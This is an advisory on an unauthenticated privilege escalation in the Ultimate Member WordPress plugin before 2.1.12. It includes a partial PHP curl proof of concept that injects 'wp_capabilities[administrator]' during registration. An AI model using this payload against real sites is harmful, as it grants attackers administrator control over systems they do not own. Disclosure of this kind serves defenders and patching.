Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta

An attacker could supply an array parameter for sensitive meta data such as the wp_capabilities user meta which defines a user’s role. During the registration process, submitted registration details were passed to the update_profile function, and any respective metadata that was submitted, regardless of what was submitted, would be updated for that newly registered user. This simple request would grant administrator access upon registration.

PoC

$username, ‘first_name-’. $form_id => $name, ‘last_name-’ . $form_id => $lastname, ‘user_email-’ . $form_id => $email, ‘user_password-’ . $form_id => ‘StrongPassword123!’, ‘confirm_user_password-’ . $form_id => ‘StrongPassword123!’, ‘wp_capabilities[administrator]’ => ‘’, ‘form_id’ => $form_id, ‘timestamp’ => ‘1603399250’, ‘um_request’ => ‘’, ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘register’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>